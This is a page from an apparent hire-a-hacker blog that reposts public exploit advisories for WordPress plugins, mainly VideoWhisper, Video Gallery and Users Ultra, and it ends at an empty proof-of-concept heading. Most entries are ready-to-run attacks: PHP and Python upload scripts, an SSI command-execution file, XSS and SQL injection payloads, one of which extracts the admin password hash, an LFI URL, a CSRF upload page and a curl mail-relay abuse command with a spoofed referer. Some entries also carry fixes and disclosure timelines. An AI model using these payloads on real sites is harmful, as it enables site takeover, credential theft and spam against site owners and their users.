Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863130502

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
source: https://www.securityfocus.com/bid/53851/info

The VideoWhisper Video Presentation plug-in for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.

An attacker can exploit this vulnerability to upload arbitrary PHP code and run it in the context of the Web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

VideoWhisper Video Presentation 3.17 is vulnerable; other versions may also be affected.

<?php

$uploadfile="lo.php.gif";
$ch = 
curl_init("http://www.example.com/wordpress/wp-content/plugins/videowhisper-video-presentation/vp/vw_upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
         array('Filedata'=>"@$uploadfile",
                'room'=>'./'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>
HireHackking 
Title: Remote file upload vulnerability in videowhisper-video-conference-integration wordpress plugin v4.91.8
Author: Larry W. Cashdollar, @_larry0
Date: 2015-03-29
Download Site: https://wordpress.org/support/plugin/videowhisper-video-conference-integration
Vendor: http://www.videowhisper.com/
Vendor Notified: 2015-03-31, won’t fix. http://www.videowhisper.com/tickets_view.php?t=10019545-1427810822
Vendor Contact: http://www.videowhisper.com/tickets_submit.php
Advisory: http://www.vapid.dhs.org/advisory.php?v=116
Description: From their site "VideoWhisper Video Conference is a modern web based multiple way video chat and real time file sharing tool.  Read more on WordPress Video Conference plugin home page."

Vulnerability:
./videowhisper-video-conference-integration/vc/vw_upload.php Allows various remote unauthenticated file uploads, among the file types is html where the last 4 characters are only being checked in a file name to match which types are allowed. Because of this .shtml can be passed through and remote code execution is SSI is allowed. The code does not do any user access validation and therefore anyone can upload the following files to an unsuspecting wordpress site: 

.shtml,swf,.zip,.rar,.jpg,jpeg,.png,.gif,.txt,.doc,docx,.htm,html,.pdf,.mp3,.flv,.avi,.mpg,.ppt,.pps The
if (strstr($filename,'.php')) exit;
can be by passed by using the extension .Php but the file extension check would allow files like test.Php.shtml

./videowhisper-video-conference-integration/vc/vw_upload.php

<?php 
if ($_GET["room"]) $room=$_GET["room"]; 
if ($_POST["room"]) $room=$_POST["room"]; 

$filename=$_FILES['vw_file']['name’];
include_once("incsan.php"); 
sanV($room);
if (!$room) exit; 
sanV($filename); 
if (!$filename) exit; 
if (strstr($filename,'.php')) exit; //do not allow uploads to other folders
if ( strstr($room,"/") || strstr($room,"..") ) exit; 
if ( strstr($filename,"/") || strstr($filename,"..") ) exit; 
$destination="uploads/".$room."/“; 
if ($_GET["slides"]) $destination .= "slides/“;
$ext=strtolower(substr($filename,-4)); $allowed=array(".swf",".zip",".rar",".jpg","jpeg",".png",".gif",".txt",".doc","docx",".htm","html",".pdf",".mp3",".flv",".avi",".mpg",".ppt",".pps”);
if (in_array($ext,$allowed)) move_uploaded_file($_FILES['vw_file']['tmp_name'], $destination . $filename);
?>loadstatus=1

CVEID: TBD
OSVDB: TBD

Exploit Code:
   videowhisp_poc.php 

   <?php
    
   $uploadfile="upexp.shtml";
   $ch = 
   curl_init("http://target_site/wp-content/plugins/videowhisper-video-conference-integration/vc/vw_upload.php");
        curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS,
             array('vw_file'=>"@$uploadfile",'name'=>'upexp.shtml','room'=>'.'));
   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
   $postResult = curl_exec($ch);
   curl_close($ch);
   print "$postResult";
    
   ?>
    
   upexp.shtml
    
   <html>
    
   <!--#exec cmd="/usr/bin/date > /tmp/p" -->
    
   this is html
   </html>
    
    
   The executeable should be located in wordpress/wp-content/plugins/videowhisper-video-conference-integration/vc/uploads
HireHackking 
# Exploit Title: WordPress Plugin Videos sync PDF 1.7.4 - Stored Cross Site Scripting (XSS)
# Google Dork: inurl:/wp-content/plugins/video-synchro-pdf/
# Date: 2022-04-13
# Exploit Author: UnD3sc0n0c1d0
# Vendor Homepage: http://www.a-j-evolution.com/
# Software Link: https://downloads.wordpress.org/plugin/video-synchro-pdf.1.7.4.zip
# Category: Web Application
# Version: 1.7.4
# Tested on: CentOS / WordPress 5.9.3
# CVE : N/A

# 1. Technical Description:
The plugin does not properly sanitize the nom, pdf, mp4, webm and ogg parameters, allowing 
potentially dangerous characters to be inserted. This includes the reported payload, which 
triggers a persistent Cross-Site Scripting (XSS).
  
# 2. Proof of Concept (PoC):
 a. Install and activate version 1.7.4 of the plugin.
 b. Go to the plugin options panel (http://[TARGET]/wp-admin/admin.php?page=aje_videosyncropdf_videos).
 c. Open the "Video example" or create a new one (whichever you prefer).
 d. Change or add in some of the displayed fields (Name, PDF file, MP4 video, WebM video or OGG video) 
	the following payload:
		" autofocus onfocus=alert(/XSS/)>.
 e. Save the changes. "Edit" button.
 f. JavaScript will be executed and a popup with the text "XSS" will be displayed.

Note: This change will be permanent until you modify the edited field.
HireHackking 
# Exploit Title: WordPress Plugin video-synchro-pdf 1.7.4 - Local File Inclusion
# Google Dork: inurl:/wp-content/plugins/video-synchro-pdf/
# Date: 26-03-2022
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
# Vendor Homepage: https://wordpress.org/plugins/video-synchro-pdf/
# Version: 1.7.4
# Tested on: Firefox

# Vulnerable File: video-synchro-pdf/reglages/Menu_Plugins/tout.php

# Vulnerable Code:

```
<?php
if ($_GET['p']<=NULL) {
	include(REPERTOIRE_VIDEOSYNCPDF.'reglages/Menu_Plugins/index.php');
}else{
	include(REPERTOIRE_VIDEOSYNCPDF.'reglages/Menu_Plugins/'.$_GET['p'].'.php');
}
```

# Proof of Concept:

http://localhost/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=
<http://localhost/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=../../../../../../../../../../../../../etc/index>[LFI]

Contents of index.php: <?php echo "Local file read"; phpinfo(); ?>
HireHackking 
<!--
Multiple SQL injection vulnerabilities in WordPress Video Player

Abstract

It was discovered that WordPress Video Player is affected by multiple blind SQL injection vulnerabilities. Using these issues it is possible for a logged on Contributor (or higher) to extract arbitrary data (eg, the Administrator's password hash) from the WordPress database.

Contact

For feedback or questions about this advisory mail us at sumofpwn at securify.nl

The Summer of Pwnage

This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.

OVE ID

OVE-20160712-0004

Tested versions

This issue was successfully tested on WordPress Video Player WordPress plugin version 1.5.16.

Fix

This issue is resolved in WordPress Video Player 1.5.18.

Introduction

WordPress Video Player is a WordPress video plugin that allows you to easily add videos to your website. WordPress Video Player is affected by multiple blind SQL injection vulnerabilities. Using these issues it is possible for a logged on Contributor (or higher) to extract arbitrary data (eg, the Administrator's password hash) from the WordPress database.

Details

The vulnerabilities exist in the functions show_tag(), spider_video_select_playlist(), and spider_video_select_video(). The author tried to prevent SQL injection by calling the esc_sql() WordPress function. However, the user input is used in the ORDER BY clause and is consequently not quoted. Due to this it is possible to inject arbitrary SQL statements despite the use of esc_sql()

show_tag():

[...]
   
if (isset($_POST['page_number'])) {
   if ($_POST['asc_or_desc']) {
      $sort["sortid_by"] = esc_sql(esc_html(stripslashes($_POST['order_by'])));
      if ($_POST['asc_or_desc'] == 1) {
         $sort["custom_style"] = "manage-column column-title sorted asc";
         $sort["1_or_2"] = "2";
         $order = "ORDER BY " . $sort["sortid_by"] . " ASC";
      } else {
         $sort["custom_style"] = "manage-column column-title sorted desc";
         $sort["1_or_2"] = "1";
         $order = "ORDER BY " . $sort["sortid_by"] . " DESC";
      }
   }


spider_video_select_playlist():
[...]
if(isset($_POST['page_number']))
{
   if($_POST['asc_or_desc'])
   {
      $sort["sortid_by"]=esc_sql(esc_html(stripslashes($_POST['order_by'])));
      if($_POST['asc_or_desc']==1)
      {
         $sort["custom_style"]="manage-column column-title sorted asc";
         $sort["1_or_2"]="2";
         $order="ORDER BY ".$sort["sortid_by"]." ASC";
      }
      else
      {
         $sort["custom_style"]="manage-column column-title sorted desc";
         $sort["1_or_2"]="1";
         $order="ORDER BY ".$sort["sortid_by"]." DESC";
      }
   }
function spider_video_select_video():

[...]
   
if(isset($_POST['page_number']))
{
      if($_POST['asc_or_desc'])
      {
         $sort["sortid_by"]=esc_html(stripslashes($_POST['order_by']));
         if($_POST['asc_or_desc']==1)
         {
            $sort["custom_style"]="manage-column column-title sorted asc";
            $sort["1_or_2"]="2";
            $order="ORDER BY ".esc_sql($sort["sortid_by"])." ASC";
         }
         else
         {
            $sort["custom_style"]="manage-column column-title sorted desc";
            $sort["1_or_2"]="1";
            $order="ORDER BY ".esc_sql($sort["sortid_by"])." DESC";
         }
      }
Proof of concept
-->

<html>
   <body>
      <form action="http://<target>/wp-admin/admin-ajax.php?action=spiderVeideoPlayerselectplaylist" method="POST">
         <input type="hidden" name="search_events_by_title" value="" />
         <input type="hidden" name="page_number" value="0" />
         <input type="hidden" name="serch_or_not" value="" />
         <input type="hidden" name="asc_or_desc" value="1" />
         <input type="hidden" name="order_by" value="(CASE WHEN (SELECT sleep(10)) = 1 THEN id ELSE title END) ASC #" />
         <input type="hidden" name="option" value="com_Spider_Video_Player" />
         <input type="hidden" name="task" value="select_playlist" />
         <input type="hidden" name="boxchecked" value="0" />
         <input type="hidden" name="filter_order_playlist" value="" />
         <input type="hidden" name="filter_order_Dir_playlist" value="" />
         <input type="submit" value="Submit request" />
      </form>
   </body>
</html>
HireHackking 
source: https://www.securityfocus.com/bid/56737/info

The Video Lead Form plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Video Lead Form 0.5 is vulnerable; other versions may also be affected. 

http://www.example.com/wordpress/wp-admin/admin.php?page=video-lead-form&errMsg=%27;alert%28String.fromCharCode%2888,83,83%29%29//%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
HireHackking 
######################

# Exploit Title : Wordpress Video Gallery 2.8 SQL Injection Vulnerabilitiey

# Exploit Author : Claudio Viviani

# Vendor Homepage : http://www.apptha.com/category/extension/Wordpress/Video-Gallery

# Software Link : https://downloads.wordpress.org/plugin/contus-video-gallery.2.8.zip

# Dork Google: inurl:/wp-admin/admin-ajax.php?action=googleadsense
            

# Date : 2015-04-04

# Tested on : Windows 7 / Mozilla Firefox
              Linux / Mozilla Firefox         

######################

# Description

 Wordpress Video Gallery 2.8 suffers from SQL injection
 
 
 Location file: /contus-video-gallery/hdflvvideoshare.php
 
 add_action('wp_ajax_googleadsense' ,'google_adsense');
 add_action('wp_ajax_nonpriv_googleadsense' ,'google_adsense');
 function google_adsense(){
     global $wpdb;
     $vid = $_GET['vid'];	
     $google_adsense_id =  $wpdb->get_var('SELECT google_adsense_value FROM '.$wpdb->prefix.'hdflvvideoshare WHERE vid ='.$vid);
     $query = $wpdb->get_var('SELECT googleadsense_details FROM '.$wpdb->prefix.'hdflvvideoshare_vgoogleadsense WHERE id='.$google_adsense_id);
     $google_adsense = unserialize($query);
     echo $google_adsense['googleadsense_code']; 
     die();

 $vid = $_GET['vid']; is not sanitized

######################

# PoC

 http://target/wp-admin/admin-ajax.php?action=googleadsense&vid=[SQLi]


######################

# Vulnerability Disclosure Timeline:

2015-04-04:  Discovered vulnerability
2015-04-06:  Vendor Notification
2015-04-06:  Vendor Response/Feedback 
2015-04-07:  Vendor Send Fix/Patch (same version number)
2015-04-13:  Public Disclosure 

#######################

Discovered By : Claudio Viviani
                http://www.homelab.it
				http://ffhd.homelab.it (Free Fuzzy Hashes Database)
				
                info@homelab.it
                homelabit@protonmail.ch

                https://www.facebook.com/homelabit
                https://twitter.com/homelabit
                https://plus.google.com/+HomelabIt1/
                https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

#####################
HireHackking 
# Exploit Title: Wordpress Video Gallery Plugin Multiple CSRF File Upload
# Google Dork: inurl:/wp-content/plugins/contus-video-gallery
# Date: 31 March 2015
# Exploit Author: Divya
# Vendor Homepage: https://wordpress.org/plugins/contus-video-gallery/
# Software Link: https://downloads.wordpress.org/plugin/contus-video-gallery.2.8.zip
# Version: 2.8
# Tested on: Windows, Linux
# CVE : None

CSRF File Upload Exploit Code:

<html>
<head>
<title>
WP Plugin CSRF File Upload
</title>
<body>
	<script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://192.168.1.2/wp-admin/admin-ajax.php?action=uploadvideo", true);
        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------103932797413649");
        xhr.withCredentials = true;
        var body = "-----------------------------103932797413649\r\n" + 
          "Content-Disposition: form-data; name=\"myfile\"; filename=\"test.mp4\"\r\n" + 
          "Content-Type: video/mp4\r\n" + 
          "\r\n" + 
          "hello world how are you\r\n" + 
          "-----------------------------103932797413649\r\n" + 
          "Content-Disposition: form-data; name=\"mode\"\r\n" + 
          "\r\n" + 
          "video\r\n" + 
          "-----------------------------103932797413649--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit" onclick="submitRequest();" />
    </form>

	
  </body>
</html>


Other CSRF vulnerable areas of application:
URL: http://192.168.1.2/wp-admin/admin-ajax.php?action=uploadvideo
Data: myfile=[upload_file_details]&mode=video

URL: http://192.168.1.2/wp-admin/admin-ajax.php?action=uploadvideo
Data: myfile=[upload_file_details]&mode=image

URL: http://192.168.1.2/wp-admin/admin-ajax.php?action=uploadvideo
Data: myfile=[upload_file_details]&mode=srt
HireHackking 
######################

# Exploit Title : Wordpress Video Gallery 2.8 Unprotected Mail Page

# Exploit Author : Claudio Viviani

# Website Author: http://www.homelab.it
                  http://archive-exploit.homelab.it/1 (Full HomelabIT Vulns Archive)

# Vendor Homepage : http://www.apptha.com/category/extension/Wordpress/Video-Gallery

# Software Link : https://downloads.wordpress.org/plugin/contus-video-gallery.2.8.zip

# Dork Google: index of "contus-video-gallery"
            

# Date : 2015-04-05

# Tested on : Windows 7 / Mozilla Firefox
              Linux / Mozilla Firefox         

######################

# Description

 Wordpress Video Gallery 2.8 suffers from Unprotected Mail Page.
 
 This vulnerability is exploitable to dos, phishing, mailbombing, spam...
 
 The "email" ajax action is callable from any guest visitor (/contus-video-gallery/hdflvvideoshare.php)
 
  /**
  * Email function
  */
 add_action( 'wp_ajax_email', 'email_function' );
 add_action( 'wp_ajax_nopriv_email', 'email_function' );
 
 function email_function() {
     require_once( dirname( __FILE__ ) . '/email.php' );
     die();
 }

 Any user can send email from /contus-video-gallery/email.php to any recipients.
 
 The variables used to send emails are:
 
 $to   = filter_input( INPUT_POST, 'to', FILTER_VALIDATE_EMAIL );
 $from = filter_input( INPUT_POST, 'from', FILTER_VALIDATE_EMAIL );
 $url  = filter_input( INPUT_POST, 'url', FILTER_VALIDATE_URL );
 $subject  = filter_input( INPUT_POST, 'Note', FILTER_SANITIZE_STRING );
 $message_content =  filter_input( INPUT_POST, 'Note', FILTER_SANITIZE_STRING );
 $title    = filter_input( INPUT_POST, 'title', FILTER_SANITIZE_STRING );
 $referrer = parse_url( $_SERVER['HTTP_REFERER'] );
 $referrer_host = $referrer['scheme'] . '://' . $referrer['host'];
 $pageURL  = 'http';
 
 It assumes that if the provided “Referrer” field fits the website’s URL, then it’s okay to send this email:
 
 if ( $referrer_host === $pageURL ) {
     $headers = "MIME-Version: 1.0" . "\r\n";
     $headers .= "Content-type:text/html;charset=UTF-8" . "\r\n";	
     $headers .= "From: " . "<" . $from . ">\r\n";
     $headers .= "Reply-To: " . $from . "\r\n";
     $headers .= "Return-path: " . $from;
     $username = explode('@' , $from );   
     $username = ucfirst($username['0']);
     $subject  =  $username . ' has shared a video with you.';
     $emailtemplate_path  = plugin_dir_url( __FILE__ ).'front/emailtemplate/Emailtemplate.html';	
     $message =  file_get_contents( $emailtemplate_path);
     $message = str_replace( '{subject}', $subject, $message );
     $message = str_replace( '{message}', $message_content, $message);
     $message = str_replace( '{videourl}',$url,$message );
     $message = str_replace('{username}',$username ,$message );
     if ( @mail( $to, $title, $message, $headers ) ) {
         echo 'success=sent';
     } else {
         echo 'success=error';
     }
 } else {
     echo 'success=error';
 }
 
 The “Referer” field can easily be modified by the attacker!

######################

# PoC

 curl -X POST -d "from=attacker@attacker.com&to=victim@victim.com&Note=BodyMessage&title=Subject&url=http://www.homelab.it" \
 -e http://127.0.0.1 http://127.0.0.1/wp-admin/admin-ajax.php?action=email

 cUrl switch "-e" spoof referer address

# Http Response

  success=sent 
  
# Poc Video

http://youtu.be/qgOGPm1-tNc
 

#######################

Discovered By : Claudio Viviani
                http://www.homelab.it
                http://archive-exploit.homelab.it/1 (Full HomelabIT Archive Exploit)
                http://ffhd.homelab.it (Free Fuzzy Hashes Database)
				
                info@homelab.it
                homelabit@protonmail.ch

                https://www.facebook.com/homelabit
                https://twitter.com/homelabit
                https://plus.google.com/+HomelabIt1/
                https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

#####################
HireHackking 
######################

# Exploit Title : Wordpress Video Gallery 2.7 SQL Injection Vulnerability

# Exploit Author : Claudio Viviani

# Vendor Homepage : http://www.apptha.com/category/extension/Wordpress/Video-Gallery

# Software Link : https://downloads.wordpress.org/plugin/contus-video-gallery.2.7.zip

# Dork Google: inurl:/wp-admin/admin-ajax.php?action=rss
            

# Date : 2015-02-11

# Tested on : Windows 7 / Mozilla Firefox
              Linux / Mozilla Firefox         

######################

# Vulnerability Disclosure Timeline:

2015-02-08:  Discovered vulnerability
2015-02-09:  Vendor Notification
2015-02-10:  Vendor Response/Feedback 
2015-02-10:  Vendor Send Fix/Patch 
2015-02-11:  Public Disclosure 

# Description

Wordpress Video Gallery 2.7 suffers from SQL injection


######################

# PoC

http://target/wp-admin/admin-ajax.php?action=rss&type=video&vid=[SQLi]


#####################

# Fix/patch sent by apptha's developer

File: videogalleryrss.php

Change line n.47 

from:

		$vid             = filter_input(INPUT_GET,'vid');
to:

		$vid             = intval(filter_input(INPUT_GET,'vid'));

#####################

Discovered By : Claudio Viviani
        	http://www.homelab.it
        	info@homelab.it
        	homelabit@protonmail.ch

        	https://www.facebook.com/homelabit
        	https://twitter.com/homelabit
        	https://plus.google.com/+HomelabIt1/
		https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

#####################
HireHackking 
# Exploit Title: WordPress Video Gallery 2.7 SQL Injection
# Date: 20-01-2015
# Software Link: https://wordpress.org/plugins/contus-video-gallery/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps

1. Description
  
$_GET['vid'] is not escaped.

google_adsense() is accessible for everyone.

File: contus-video-gallery\hdflvvideoshare.php

add_action('wp_ajax_googleadsense' ,'google_adsense');
add_action('wp_ajax_nonpriv_googleadsense' ,'google_adsense');
function google_adsense(){
	global $wpdb;
	$vid = $_GET['vid'];
	$google_adsense_id =  $wpdb->get_var('SELECT google_adsense_value FROM '.$wpdb->prefix.'hdflvvideoshare WHERE vid ='.$vid);
	$query = $wpdb->get_var('SELECT googleadsense_details FROM '.$wpdb->prefix.'hdflvvideoshare_vgoogleadsense WHERE id='.$google_adsense_id);
	$google_adsense = unserialize($query);
	echo $google_adsense['googleadsense_code'];
	die();
}

http://security.szurek.pl/wordpress-video-gallery-27-sql-injection.html

2. Proof of Concept

http://wordpress-url/wp-admin/admin-ajax.php?action=googleadsense&vid=0 UNION SELECT CAST(CHAR(48, 32, 85, 78, 73, 79, 78, 32, 83, 69, 76, 69, 67, 84, 32, 67, 79, 78, 67, 65, 84, 40, 67, 65, 83, 84, 40, 67, 72, 65, 82, 40, 57, 55, 44, 32, 53, 56, 44, 32, 52, 57, 44, 32, 53, 56, 44, 32, 49, 50, 51, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 57, 44, 32, 53, 54, 44, 32, 53, 56, 44, 32, 51, 52, 44, 32, 49, 48, 51, 44, 32, 49, 49, 49, 44, 32, 49, 49, 49, 44, 32, 49, 48, 51, 44, 32, 49, 48, 56, 44, 32, 49, 48, 49, 44, 32, 57, 55, 44, 32, 49, 48, 48, 44, 32, 49, 49, 53, 44, 32, 49, 48, 49, 44, 32, 49, 49, 48, 44, 32, 49, 49, 53, 44, 32, 49, 48, 49, 44, 32, 57, 53, 44, 32, 57, 57, 44, 32, 49, 49, 49, 44, 32, 49, 48, 48, 44, 32, 49, 48, 49, 44, 32, 51, 52, 44, 32, 53, 57, 44, 32, 49, 49, 53, 44, 32, 53, 56, 41, 32, 97, 115, 32, 67, 72, 65, 82, 41, 44, 32, 76, 69, 78, 71, 84, 72, 40, 117, 115, 101, 114, 95, 112, 97, 115, 115, 41, 44, 32, 67, 65, 83, 84, 40, 67, 72, 65, 82, 40, 53, 56, 44, 32, 51, 52, 41, 32, 97, 115, 32, 67, 72, 65, 82, 41, 44, 32, 117, 115, 101, 114, 95, 112, 97, 115, 115, 44, 32, 67, 65, 83, 84, 40, 67, 72, 65, 82, 40, 51, 52, 44, 32, 53, 57, 44, 32, 49, 50, 53, 41, 32, 97, 115, 32, 67, 72, 65, 82, 41, 41, 32, 70, 82, 79, 77, 32, 119, 112, 95, 117, 115, 101, 114, 115, 32, 87, 72, 69, 82, 69, 32, 73, 68, 32, 61, 32, 49) as CHAR)
  
3. Solution:
  
Update to version 2.8
HireHackking 
* Exploit Title: WordPress Users Ultra Plugin [Unrestricted File Upload]
* Discovery Date: 2015/10/27
* Public Disclosure Date: 2015/12/01
* Exploit Author: Panagiotis Vagenas
* Contact: https://twitter.com/panVagenas
* Vendor Homepage: http://usersultra.com
* Software Link: https://wordpress.org/plugins/users-ultra/
* Version: 1.5.50
* Tested on: WordPress 4.3.1
* Category: webapps

Description
================================================================================

WordPress plugin `Users Ultra Plugin` suffers for an unrestricted file upload vulnerability.

Any user (registered or not) can exploit a misbehavior of the plugin in order to upload csv files to the infected website. Although the plugin checks file extension using an extensions white-list (in this case only csv files are white-listed), no other checks (mime, size etc) are taking place. This alone can expose the infected website to a variety of attacks, please see [OWASP Unrestricted File Upload](https://www.owasp.org/index.php/Unrestricted_File_Upload) to get an idea.

Details
================================================================================

The plugin workflow that could allow a malicious user to exploit this misbehavior is as follows:

1. Upon initialization of the plugin (anytime if it is activated) an instance of `XooUserUser` class is created
2. In the constructor of `XooUserUser` class a check for POST variable `uultra-form-cvs-form-conf` is taking place
    file `wp-content/plugins/users-ultra/xooclasses/xoo.userultra.user.php` lines 19-23
    ```php
    if (isset($_POST['uultra-form-cvs-form-conf'])) 
    {
	    /* Let's Update the Profile */
	    $this->process_cvs($_FILES);				
    }
    ```
3. Assuming the POST variable `uultra-form-cvs-form-conf` has been set in the request, the method `XooUserUser::process_cvs()` is called.
4. `XooUserUser::process_cvs()` method process every file in $_FILES super-global by only making a check if the file has a `csv` extension

In addition we mark the following points:

1. A malicious user can create and activate user accounts by exploiting this vulnerability if `$_POST["uultra-activate-account"]` is set to `active`
2. A welcome email is send if `$_POST["uultra-send-welcome-email"]` is set to 1
3. The csv files uploaded to the server are stored in a directory (`wp-content/usersultramedia/import` by default) accessible by anyone
4. Any additional columns present in the csv file are stored in `usermeta`
5. No sanitization for values in csv file can easily lead to a Persistent XSS attack, so an attacker can compromise the whole site

PoC
================================================================================

The following Python3 script forms a csv file and uploads it to a site

```python3
#!/usr/bin/python3
import requests
import csv
import tempfile

url = 'http://example.com/'

postData = {
    'uultra-form-cvs-form-conf': 1,
    'uultra-send-welcome-email': 1,
    'uultra-activate-account': 'pending'
}

csvFileHeader = ['user name', 'email', 'display name', 'registration date', 'first name', 'last name', 'age', 'country']
csvFileRow = ['userName', 'email@example.com', 'User Name', '1/1/1', 'User', 'Name', '100', 'IO']

csvFile = tempfile.NamedTemporaryFile(mode='a+t', suffix='.csv')

wr = csv.writer(csvFile, quoting=csv.QUOTE_ALL, delimiter=',')

wr.writerow(csvFileHeader)
wr.writerow(csvFileRow)

csvFile.seek(0)

files = {'file.csv': csvFile}

r = requests.post(url, data=postData, files=files)

exit(0)
```

Timeline
================================================================================

2015/10/29 - Vendor notified via email
2015/11/11 - Vendor notified via contact form in his website
2015/11/13 - Vendor notified via support forums at wordpress.org
2015/11/14 - Vendor responded and received report through email
2015/11/15 - Vendor responded
2015/11/15 - Patch released

Solution
================================================================================

Update to version 1.5.59
HireHackking 
* Exploit Title: WordPress Users Ultra Plugin [Persistence XSS]
* Discovery Date: 2015/10/20
* Public Disclosure Date: 2015/12/01
* Exploit Author: Panagiotis Vagenas
* Contact: https://twitter.com/panVagenas
* Vendor Homepage: http://usersultra.com
* Software Link: https://wordpress.org/plugins/users-ultra/
* Version: 1.5.50
* Tested on: WordPress 4.3.1
* Category: webapps


Description
========================================================================
========

Once a user is registered he can add new subscription packages or
modify existing ones. No data sanitization is
taking place before saving package details in DB. This allows a
malicious user to include JS code in package name
and/or package description.

PoC
========================================================================
========

- - Send a post request to
`http://vuln.site.tld/wp-admin/admin-ajax.php` with data:
`action=package_add_new&p_name=a<script>alert(1)</script>`
- - Visit
`http://vuln.site.tld/wp-admin/admin.php?page=userultra&tab=membership`
as
admin or go to the page that
contains package information at front end.

Timeline
========================================================================
========

2015/10/29 - Vendor notified via email
2015/11/11 - Vendor notified via contact form in his website
2015/11/13 - Vendor notified via support forums at wordpress.org
2015/11/14 - Vendor responded and received report through email

Solution
========================================================================
========

No official solution yet exists.
HireHackking 
* Exploit Title: WordPress Users Ultra Plugin [Blind SQL injection]
* Discovery Date: 2015/10/19
* Public Disclosure Date: 2015/12/01
* Exploit Author: Panagiotis Vagenas
* Contact: https://twitter.com/panVagenas
* Vendor Homepage: http://usersultra.com
* Software Link: https://wordpress.org/plugins/users-ultra/
* Version: 1.5.50
* Tested on: WordPress 4.3.1
* Category: webapps

Description
========================================================================

One can perform an SQL injection attack simply by exploiting the following =
WP ajax actions:

1. `edit_video`
2. `delete_photo`
3. `delete_gallery`
4. `delete_video`
5. `reload_photos`
6. `edit_gallery`
7. `edit_gallery_confirm`
8. `edit_photo`
9. `edit_photo_confirm`
10. `edit_video_confirm`
11. `set_as_main_photo`
12. `sort_photo_list`
13. `sort_gallery_list`
14. `reload_videos`

POST parameters that are exploitable in each action respectively:

1. `video_id`
2. `photo_id`
3. `gal_id`
4. `video_id`
5. `gal_id`
6. `gal_id`
7. `gal_id`
8. `photo_id`
9. `photo_id`
10. `video_id`
11. `photo_id`, `gal_id`
12. `order`
13. `order`
14. `video_id`

In case #7 a user can also change the gallery name, description and visibil=
ity by setting POST parameters `gal_name`, `gal_desc` and `gal_visibility` =
respectively.

In case #8 `photo_id` is first casted to integer and a query to DB is perfo=
rmed. If results are returned then for each result a new query is performed=
 without casting the `photo_id` to integer. So if an attacker knows a valid=
 video id then it can perform the attack in the second query. This achievab=
le because `<?php (int)'1 and sleep(5)' === 1; ?>

In case #9 a user can also change the photo name, description, tags and cat=
egory by setting POST parameters `photo_name`, `photo_desc`, `photo_tags` a=
nd `photo_category` respectively.

In case #10 a user can also change the video name, unique id and type by se=
tting POST parameters `video_name`, `video_unique_id` and `video_type` resp=
ectively.

Because function wpdb::get_results() and wpdb::query() are in use here, onl=
y one SQL statement can be made per request. This holds severity of the att=
ack low.
In addition all actions are privileged so the user must have an active acco=
unt in vulnerable website, in order to perform the attack.


PoC
========================================================================

Send a post request to `http://my.vulnerable.website.com/wp-admin/admin-aja=
x.php` with data: `action=edit_video&video_id=1 and sleep(5) `

Timeline
========================================================================

2015/10/29 - Vendor notified via email
2015/11/11 - Vendor notified via contact form in his website
2015/11/13 - Vendor notified via support forums at wordpress.org
2015/11/14 - Vendor responded and received report through email
2015/12/08 - Vendor provided new version 1.5.63 which resolves issues

Solution
========================================================================

Upgrade to version 1.5.63
HireHackking 
# Exploit Title: UserPro <= 4.9.32 Reflected XSS
# Google Dork: intitle:"Index of" intitle:"UserPro" -uploads
# Date: 25 August 2019
# Exploit Author: Damian Ebelties (https://zerodays.lol/)
# Vendor Homepage: https://codecanyon.net/item/userpro-user-profiles-with-social-login/5958681
# Version: <= 4.9.32
# Tested on: Ubuntu 18.04.1
# CVE: CVE-2019-14470

The WordPress plug-in 'UserPro' uses a Instagram library (Instagram PHP API V2 by cosenary) that
is vulnerable for Reflected Cross-Site Scripting (XSS).

There is more vulnerable code in 'UserPro' core, might release that later.

As of today (25 August 2019) this issue is unfixed.

Vulnerable code: (success.php on line 36)

    if (isset($_GET['error'])) {
        echo 'An error occurred: ' . $_GET['error_description'];
    }

    > https://github.com/cosenary/Instagram-PHP-API/blob/master/example/success.php#L36

Proof-of-Concept:

